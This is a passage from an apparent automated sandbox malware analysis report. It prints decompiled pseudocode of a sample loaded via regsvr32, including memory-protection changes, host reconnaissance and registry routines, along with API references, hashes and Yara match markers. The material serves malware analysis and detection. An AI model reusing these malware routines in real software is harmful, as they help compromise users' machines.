                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                  • String ID:
                                                  • API String ID: 1676223858-0
                                                  • Opcode ID: e9978c4cd67a01599e94d0ccc3418793f00ffe8c8f6274c7d632a09f35f9cbd6
                                                  • Instruction ID: 969973ba5fe35f603fda98fb9e63590225c51b608780b3fd095b3bcc5885121c
                                                  • Opcode Fuzzy Hash: e9978c4cd67a01599e94d0ccc3418793f00ffe8c8f6274c7d632a09f35f9cbd6
                                                  • Instruction Fuzzy Hash: BC2150B5200204EFEB11EF55DC84F9E37ACEB48759F104026F902DB260DB70EE45ABA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E005E1179(void* __eax, void* _a4) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				long _v20;
                                                  				int _t43;
                                                  				long _t54;
                                                  				signed int _t57;
                                                  				void* _t58;
                                                  				signed int _t60;
                                                  
                                                  				_v12 = _v12 & 0x00000000;
                                                  				_t57 =  *0x5e414c;
                                                  				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                                                  				_v16 =  *(__eax + 6) & 0x0000ffff;
                                                  				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
                                                  				_v8 = _v8 & 0x00000000;
                                                  				if(_v16 <= 0) {
                                                  					L12:
                                                  					return _v12;
                                                  				} else {
                                                  					goto L1;
                                                  				}
                                                  				while(1) {
                                                  					L1:
                                                  					_t60 = _v12;
                                                  					if(_t60 != 0) {
                                                  						goto L12;
                                                  					}
                                                  					asm("bt [esi+0x24], eax");
                                                  					if(_t60 >= 0) {
                                                  						asm("bt [esi+0x24], eax");
                                                  						if(__eflags >= 0) {
                                                  							L8:
                                                  							_t54 = _t57 - 0x63699bbf;
                                                  							L9:
                                                  							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
                                                  							if(_t43 == 0) {
                                                  								_v12 = GetLastError();
                                                  							}
                                                  							_v8 = _v8 + 1;
                                                  							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
                                                  							if(_v8 < _v16) {
                                                  								continue;
                                                  							} else {
                                                  								goto L12;
                                                  							}
                                                  						}
                                                  						asm("bt [esi+0x24], eax");
                                                  						_t54 = _t57 - 0x63699bc1;
                                                  						if(__eflags >= 0) {
                                                  							goto L9;
                                                  						}
                                                  						goto L8;
                                                  					}
                                                  					asm("bt [esi+0x24], eax");
                                                  					if(_t60 >= 0) {
                                                  						_t54 = _t57 - 0x63699ba3;
                                                  					} else {
                                                  						_t54 = _t57 - 0x63699b83;
                                                  					}
                                                  					goto L9;
                                                  				}
                                                  				goto L12;
                                                  			}

                                                  APIs
                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 005E11B2
                                                  • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 005E1227
                                                  • GetLastError.KERNEL32 ref: 005E122D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ProtectVirtual$ErrorLast
                                                  • String ID:
                                                  • API String ID: 1469625949-0
                                                  • Opcode ID: ce8808c7ed7d57795d431e301e571d3e78c2b61637b1966021a0c1a47c4ab84b
                                                  • Instruction ID: fdfc9731299768adfea1baaaae5665ca66c30b0b5fdeb3d91872f1c340929cf1
                                                  • Opcode Fuzzy Hash: ce8808c7ed7d57795d431e301e571d3e78c2b61637b1966021a0c1a47c4ab84b
                                                  • Instruction Fuzzy Hash: D5219131900606EFCB18CF96C885AAAFBF5FF54319F004859D18297441E378A699DB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 90%
                                                  			E00C83DD9(void* __eflags, int _a4) {
                                                  				intOrPtr _v12;
                                                  				WCHAR* _v16;
                                                  				char* _v20;
                                                  				int _v24;
                                                  				void* _v36;
                                                  				char _v40;
                                                  				char _v68;
                                                  				char _v72;
                                                  				char _v76;
                                                  				char _v80;
                                                  				void _v84;
                                                  				char _v88;
                                                  				void* __ebx;
                                                  				void* __esi;
                                                  				intOrPtr _t40;
                                                  				int _t45;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t52;
                                                  				void* _t55;
                                                  				intOrPtr _t67;
                                                  				void* _t70;
                                                  				void* _t80;
                                                  				WCHAR* _t85;
                                                  
                                                  				_v88 = 0;
                                                  				memset( &_v84, 0, 0x2c);
                                                  				_v40 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_t40 =  *0xc8d27c; // 0x41a5a8
                                                  				_t5 = _t40 + 0xc8ee40; // 0x410025
                                                  				_t85 = E00C86A12(_t5);
                                                  				_v16 = _t85;
                                                  				if(_t85 == 0) {
                                                  					_t80 = 8;
                                                  					L24:
                                                  					return _t80;
                                                  				}
                                                  				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
                                                  				if(_t45 != 0) {
                                                  					_t80 = 1;
                                                  					L22:
                                                  					E00C89039(_v16);
                                                  					goto L24;
                                                  				}
                                                  				if(E00C8A72D(0,  &_a4) != 0) {
                                                  					_a4 = 0;
                                                  				}
                                                  				_t50 = E00C8809F(0,  *0xc8d33c);
                                                  				_v12 = _t50;
                                                  				if(_t50 == 0) {
                                                  					_t80 = 8;
                                                  					goto L19;
                                                  				} else {
                                                  					_t52 =  *0xc8d27c; // 0x41a5a8
                                                  					_t11 = _t52 + 0xc8e81a; // 0x65696c43
                                                  					_t55 = E00C8809F(0, _t11);
                                                  					_t87 = _t55;
                                                  					if(_t55 == 0) {
                                                  						_t80 = 8;
                                                  					} else {
                                                  						_t80 = E00C86BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
                                                  						E00C89039(_t87);
                                                  					}
                                                  					if(_t80 != 0) {
                                                  						L17:
                                                  						E00C89039(_v12);
                                                  						L19:
                                                  						_t86 = _a4;
                                                  						if(_a4 != 0) {
                                                  							E00C81F99(_t86);
                                                  						}
                                                  						goto L22;
                                                  					} else {
                                                  						if(( *0xc8d260 & 0x00000001) == 0) {
                                                  							L14:
                                                  							E00C88F83(_t80, _v88, _v84,  *0xc8d270, 0);
                                                  							_t80 = E00C81C74(_v88,  &_v80,  &_v76, 0);
                                                  							if(_t80 == 0) {
                                                  								_v24 = _a4;
                                                  								_v20 =  &_v88;
                                                  								_t80 = E00C842EA( &_v40, 0);
                                                  							}
                                                  							E00C89039(_v88);
                                                  							goto L17;
                                                  						}
                                                  						_t67 =  *0xc8d27c; // 0x41a5a8
                                                  						_t18 = _t67 + 0xc8e823; // 0x65696c43
                                                  						_t70 = E00C8809F(0, _t18);
                                                  						_t89 = _t70;
                                                  						if(_t70 == 0) {
                                                  							_t80 = 8;
                                                  						} else {
                                                  							_t80 = E00C86BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
                                                  							E00C89039(_t89);
                                                  						}
                                                  						if(_t80 != 0) {
                                                  							goto L17;
                                                  						} else {
                                                  							goto L14;
                                                  						}
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                  • memset.NTDLL ref: 00C83DEE
                                                    • Part of subcall function 00C86A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,00C83E14,00410025,00000005,?,00000000), ref: 00C86A23
                                                    • Part of subcall function 00C86A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 00C86A40
                                                  • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00C83E22
                                                  • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 00C83E2D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                  • String ID:
                                                  • API String ID: 3817122888-0
                                                  • Opcode ID: 06c9558076e06a9147c768476909307030801dbdd7bbbf00447c3cb24692f499
                                                  • Instruction ID: 3481f94a92ca64af35b8251a463cb47a6d0d1b67b938d104a12e9f66b9255ba1
                                                  • Opcode Fuzzy Hash: 06c9558076e06a9147c768476909307030801dbdd7bbbf00447c3cb24692f499
                                                  • Instruction Fuzzy Hash: B6416D71A01218ABDB11FFE4CC85EEE7BBCEF08748B044565BA02E7151D7719E48AB98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 75%
                                                  			E00C89152(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                  				void* _v8;
                                                  				void* __esi;
                                                  				intOrPtr* _t35;
                                                  				void* _t40;
                                                  				intOrPtr* _t41;
                                                  				intOrPtr* _t43;
                                                  				intOrPtr* _t45;
                                                  				intOrPtr* _t50;
                                                  				intOrPtr* _t52;
                                                  				void* _t54;
                                                  				intOrPtr* _t55;
                                                  				intOrPtr* _t57;
                                                  				intOrPtr* _t61;
                                                  				intOrPtr* _t65;
                                                  				intOrPtr _t68;
                                                  				void* _t72;
                                                  				void* _t75;
                                                  				void* _t76;
                                                  
                                                  				_t55 = _a4;
                                                  				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                  				_a4 = 0;
                                                  				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                  				if(_t76 < 0) {
                                                  					L18:
                                                  					return _t76;
                                                  				}
                                                  				_t40 = E00C83AEF(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                  				_t76 = _t40;
                                                  				if(_t76 >= 0) {
                                                  					_t61 = _a28;
                                                  					if(_t61 != 0 &&  *_t61 != 0) {
                                                  						_t52 = _v8;
                                                  						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                  					}
                                                  					if(_t76 >= 0) {
                                                  						_t43 =  *_t55;
                                                  						_t68 =  *0xc8d27c; // 0x41a5a8
                                                  						_t20 = _t68 + 0xc8e1fc; // 0x740053
                                                  						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                  						if(_t76 >= 0) {
                                                  							_t76 = E00C87C14(_a4);
                                                  							if(_t76 >= 0) {
                                                  								_t65 = _a28;
                                                  								if(_t65 != 0 &&  *_t65 == 0) {
                                                  									_t50 = _a4;
                                                  									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                  								}
                                                  							}
                                                  						}
                                                  						_t45 = _a4;
                                                  						if(_t45 != 0) {
                                                  							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                  						}
                                                  						_t57 = __imp__#6;
                                                  						if(_a20 != 0) {
                                                  							 *_t57(_a20);
                                                  						}
                                                  						if(_a12 != 0) {
                                                  							 *_t57(_a12);
                                                  						}
                                                  					}
                                                  				}
                                                  				_t41 = _v8;
                                                  				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                  				goto L18;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 00C83AEF: SysAllocString.OLEAUT32(80000002), ref: 00C83B46
                                                    • Part of subcall function 00C83AEF: SysFreeString.OLEAUT32(00000000), ref: 00C83BAB
                                                  • SysFreeString.OLEAUT32(?), ref: 00C89231
                                                  • SysFreeString.OLEAUT32(00C81885), ref: 00C8923B
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: String$Free$Alloc
                                                  • String ID:
                                                  • API String ID: 986138563-0
                                                  • Opcode ID: 4e9dfdcde350aeadffffda4bfaaf9ae50621e173f21f3f87b1dc58f1a6b95c4a
                                                  • Instruction ID: a141daf5077df61335271253ef350c011520e672a2e10826a4ae19837ea19b13
                                                  • Opcode Fuzzy Hash: 4e9dfdcde350aeadffffda4bfaaf9ae50621e173f21f3f87b1dc58f1a6b95c4a
                                                  • Instruction Fuzzy Hash: 64314A72900119BFCB15EFA5C888CAFBB7AFFC97447144658F8159B220E231EE51DBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E005E135A() {
                                                  				char _v16;
                                                  				intOrPtr _v28;
                                                  				void _v32;
                                                  				void* _v36;
                                                  				intOrPtr _t15;
                                                  				void* _t16;
                                                  				long _t25;
                                                  				int _t26;
                                                  				void* _t30;
                                                  				intOrPtr* _t32;
                                                  				signed int _t36;
                                                  				intOrPtr _t39;
                                                  
                                                  				_t15 =  *0x5e4150;
                                                  				if( *0x5e412c > 5) {
                                                  					_t16 = _t15 + 0x5e50f9;
                                                  				} else {
                                                  					_t16 = _t15 + 0x5e50b1;
                                                  				}
                                                  				E005E1FE7(_t16, _t16);
                                                  				_t36 = 6;
                                                  				memset( &_v32, 0, _t36 << 2);
                                                  				if(E005E1414( &_v32,  &_v16,  *0x5e414c ^ 0xfd7cd1cf) == 0) {
                                                  					_t25 = 0xb;
                                                  				} else {
                                                  					_t26 = lstrlenW( *0x5e4138);
                                                  					_t8 = _t26 + 2; // 0x2
                                                  					_t11 = _t26 + _t8 + 8; // 0xa
                                                  					_t30 = E005E102F(_t39, _t11,  &_v32,  &_v36); // executed
                                                  					if(_t30 == 0) {
                                                  						_t32 = _v36;
                                                  						 *_t32 = 0;
                                                  						if( *0x5e4138 == 0) {
                                                  							 *((short*)(_t32 + 4)) = 0;
                                                  						} else {
                                                  							E005E200D(_t44, _t32 + 4);
                                                  						}
                                                  					}
                                                  					_t25 = E005E1E11(_v28); // executed
                                                  				}
                                                  				ExitThread(_t25);
                                                  			}

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExitThreadlstrlen
                                                  • String ID:
                                                  • API String ID: 2636182767-0
                                                  • Opcode ID: c992342dd6622324afdb9a767c95938e6051d97e825f430467df7491504de3f0
                                                  • Instruction ID: a35e08e8b04fd91c3902b1446eebd66ca55eb16928f94f4d65d77729c822d37a
                                                  • Opcode Fuzzy Hash: c992342dd6622324afdb9a767c95938e6051d97e825f430467df7491504de3f0
                                                  • Instruction Fuzzy Hash: 2B11AF319046C59BDB1CDB66CC8CD9B7BECBB58300F010815B1D5DB161E730E5488B56
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E00C854BC(void* __ecx) {
                                                  				signed int _v8;
                                                  				void* _t15;
                                                  				void* _t19;
                                                  				void* _t20;
                                                  				void* _t22;
                                                  				intOrPtr* _t23;
                                                  
                                                  				_t23 = __imp__;
                                                  				_t20 = 0;
                                                  				_v8 = _v8 & 0;
                                                  				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                  				_t10 = _v8;
                                                  				if(_v8 != 0) {
                                                  					_t20 = E00C82049(_t10 + 1);
                                                  					if(_t20 != 0) {
                                                  						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                  						if(_t15 != 0) {
                                                  							 *((char*)(_v8 + _t20)) = 0;
                                                  						} else {
                                                  							E00C89039(_t20);
                                                  							_t20 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t20;
                                                  			}

                                                  APIs
                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,00C8A306,7519F710,00000000,?,?,00C8A306), ref: 00C854D4
                                                    • Part of subcall function 00C82049: RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,00C8A306,00C8A307,?,?,00C8A306), ref: 00C854F1
                                                    • Part of subcall function 00C89039: HeapFree.KERNEL32(00000000,00000000,00C87F18,00000000,?,?,00000000), ref: 00C89045
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: ComputerHeapName$AllocateFree
                                                  • String ID:
                                                  • API String ID: 187446995-0
                                                  • Opcode ID: 79d7c9f63a1fea496a80f8c84f85ae81534a31d26ae520be778562f0ba7b99f9
                                                  • Instruction ID: 42a665fac0a576e37cdcdb4b136c051c18b77b37fe15fe2e79f894eb60908d98
                                                  • Opcode Fuzzy Hash: 79d7c9f63a1fea496a80f8c84f85ae81534a31d26ae520be778562f0ba7b99f9
                                                  • Instruction Fuzzy Hash: F8F0BE32600109FAEB10E6AA8C40FAF36EEDBC5748F200069A911E3100EAB0DF01A774
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _t4;
                                                  				void* _t10;
                                                  				void* _t11;
                                                  				void* _t12;
                                                  				void* _t14;
                                                  
                                                  				_t14 = 1;
                                                  				_t4 = _a8;
                                                  				if(_t4 == 0) {
                                                  					if(InterlockedDecrement(0xc8d23c) == 0) {
                                                  						E00C8970F();
                                                  					}
                                                  				} else {
                                                  					if(_t4 == 1 && InterlockedIncrement(0xc8d23c) == 1) {
                                                  						_t10 = E00C86A56(_t11, _t12, _a4); // executed
                                                  						if(_t10 != 0) {
                                                  							_t14 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t14;
                                                  			}








                                                  0x00c8805c
                                                  0x00c8805d
                                                  0x00c88060
                                                  0x00c88092
                                                  0x00c88094
                                                  0x00c88094
                                                  0x00c88062
                                                  0x00c88063
                                                  0x00c88078
                                                  0x00c8807f
                                                  0x00c88081
                                                  0x00c88081
                                                  0x00c8807f
                                                  0x00c88063
                                                  0x00c8809c

                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(00C8D23C), ref: 00C8806A
                                                    • Part of subcall function 00C86A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00C8807D,?), ref: 00C86A69
                                                  • InterlockedDecrement.KERNEL32(00C8D23C), ref: 00C8808A
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                  • String ID:
                                                  • API String ID: 3834848776-0
                                                  • Opcode ID: 4110adcfe40f2526878a7a7d269d7aaa1acdde61f6fe1e157b6440a7a269df15
                                                  • Instruction ID: fc92a13b323fa4fc345ba06106aa0f675f9274245e7255ac9ce20de6ca200470
                                                  • Opcode Fuzzy Hash: 4110adcfe40f2526878a7a7d269d7aaa1acdde61f6fe1e157b6440a7a269df15
                                                  • Instruction Fuzzy Hash: 58E026342002219383383BF09C48B6EA740AF10BCCF844020F695D14A0CF20DC4CA7ED
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 34%
                                                  			E00C89318(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                  				intOrPtr _v12;
                                                  				void* _v18;
                                                  				short _v20;
                                                  				intOrPtr _t15;
                                                  				short _t17;
                                                  				intOrPtr _t19;
                                                  				short _t23;
                                                  
                                                  				_t23 = 0;
                                                  				_v20 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosw");
                                                  				_t15 =  *0xc8d27c; // 0x41a5a8
                                                  				_t4 = _t15 + 0xc8e39c; // 0x10a8944
                                                  				_t20 = _t4;
                                                  				_t6 = _t15 + 0xc8e124; // 0x650047
                                                  				_t17 = E00C89152(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                  				if(_t17 < 0) {
                                                  					_t23 = _t17;
                                                  				} else {
                                                  					if(_v20 != 8) {
                                                  						_t23 = 1;
                                                  					} else {
                                                  						_t19 = E00C89FC9(_t20, _v12);
                                                  						if(_t19 == 0) {
                                                  							_t23 = 8;
                                                  						} else {
                                                  							 *_a16 = _t19;
                                                  						}
                                                  						__imp__#6(_v12);
                                                  					}
                                                  				}
                                                  				return _t23;
                                                  			}










                                                  0x00c89322
                                                  0x00c89324
                                                  0x00c8932b
                                                  0x00c8932c
                                                  0x00c8932d
                                                  0x00c8932e
                                                  0x00c89334
                                                  0x00c89339
                                                  0x00c89339
                                                  0x00c89343
                                                  0x00c89355
                                                  0x00c8935c
                                                  0x00c8938b
                                                  0x00c8935e
                                                  0x00c89363
                                                  0x00c89388
                                                  0x00c89365
                                                  0x00c89368
                                                  0x00c8936f
                                                  0x00c8937a
                                                  0x00c89371
                                                  0x00c89374
                                                  0x00c89374
                                                  0x00c8937e
                                                  0x00c8937e
                                                  0x00c89363
                                                  0x00c89392

                                                  APIs
                                                    • Part of subcall function 00C89152: SysFreeString.OLEAUT32(?), ref: 00C89231
                                                    • Part of subcall function 00C89FC9: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00C87946,004F0053,00000000,?), ref: 00C89FD2
                                                    • Part of subcall function 00C89FC9: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00C87946,004F0053,00000000,?), ref: 00C89FFC
                                                    • Part of subcall function 00C89FC9: memset.NTDLL ref: 00C8A010
                                                  • SysFreeString.OLEAUT32(00000000), ref: 00C8937E
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: FreeString$lstrlenmemcpymemset
                                                  • String ID:
                                                  • API String ID: 397948122-0
                                                  • Opcode ID: 36de498f9ea5bfc41ea4ba6538a787944ee19cfa65b434d4ab6c8c78e6a93ba5
                                                  • Instruction ID: 018814d56f04ef1361e924146e16f4578175cca899f72b7c33214180f44e15c6
                                                  • Opcode Fuzzy Hash: 36de498f9ea5bfc41ea4ba6538a787944ee19cfa65b434d4ab6c8c78e6a93ba5
                                                  • Instruction Fuzzy Hash: 2A01B132500129BFCF10BFA8CC449BEBBB8FB45748F044825FA11E20B0D37099549795
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 37%
                                                  			E005E1FE7(void* __eax, intOrPtr _a4) {
                                                  
                                                  				 *0x5e4148 =  *0x5e4148 & 0x00000000;
                                                  				_push(0);
                                                  				_push(0x5e4144);
                                                  				_push(1);
                                                  				_push(_a4);
                                                  				 *0x5e4140 = 0xc; // executed
                                                  				L005E1BD6(); // executed
                                                  				return __eax;
                                                  			}



                                                  0x005e1fe7
                                                  0x005e1fee
                                                  0x005e1ff0
                                                  0x005e1ff5
                                                  0x005e1ff7
                                                  0x005e1ffb
                                                  0x005e2005
                                                  0x005e200a

                                                  APIs
                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(005E1387,00000001,005E4144,00000000), ref: 005E2005
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.646366246.00000000005E0000.00000040.00020000.sdmp, Offset: 005E0000, based on PE: true
                                                  • Associated: 00000002.00000002.646415549.00000000005E5000.00000040.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_5e0000_regsvr32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: DescriptorSecurity$ConvertString
                                                  • String ID:
                                                  • API String ID: 3907675253-0
                                                  • Opcode ID: 50e40b9932d83ac41239c79b7a0374757d5d4c69fe008fa94e7f7e11f53ab7ee
                                                  • Instruction ID: c7b5108b5fa7f61c304aefef66bd61b2116b5610d210727caaff7827dc283f53
                                                  • Opcode Fuzzy Hash: 50e40b9932d83ac41239c79b7a0374757d5d4c69fe008fa94e7f7e11f53ab7ee
                                                  • Instruction Fuzzy Hash: 96C04CB4140381A7EA2C9B029C86F057A567770705F104508F1902A1D083F91098DD19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00C82049(long _a4) {
                                                  				void* _t2;
                                                  
                                                  				_t2 = RtlAllocateHeap( *0xc8d238, 0, _a4); // executed
                                                  				return _t2;
                                                  			}




                                                  0x00c82055
                                                  0x00c8205b

                                                  APIs
                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00C87E50), ref: 00C82055
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.647626271.0000000000C81000.00000020.00020000.sdmp, Offset: 00C80000, based on PE: true
                                                  • Associated: 00000002.00000002.647575163.0000000000C80000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647768895.0000000000C8C000.00000002.00020000.sdmp
                                                  • Associated: 00000002.00000002.647843225.0000000000C8D000.00000004.00020000.sdmp
                                                  • Associated: 00000002.00000002.647938196.0000000000C8F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_c80000_regsvr32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHeap
                                                  • String ID:
                                                  • API String ID: 1279760036-0
                                                  • Opcode ID: 4e29ab31fc2c7a38ed3b284e8eb2651d50edf32635e394c63af3af7994e9d56d
                                                  • Instruction ID: fa8a242a43f2b1016227e9c74161c85ca19bee9d37d63dc321c83e9e905f3912
                                                  • Opcode Fuzzy Hash: 4e29ab31fc2c7a38ed3b284e8eb2651d50edf32635e394c63af3af7994e9d56d
                                                  • Instruction Fuzzy Hash: 78B01236400100EBCA064B00DD04F0DBB21AB54710F004114B205440B0C3314860FB1D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 85%
                                                  			E005E1E11(void* __eax) {
                                                  				char _v8;
                                                  				void* _v12;
                                                  				void* __edi;
                                                  				void* _t18;
                                                  				long _t26;
                                                  				long _t29;
                                                  				intOrPtr _t40;
                                                  				void* _t41;
                                                  				intOrPtr* _t42;
                                                  				void* _t44;
                                                  
                                                  				_t41 = __eax;
                                                  				_t16 =  *0x5e414c;
                                                  				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x5e414c - 0x63698bc4 &  !( *0x5e414c - 0x63698bc4);
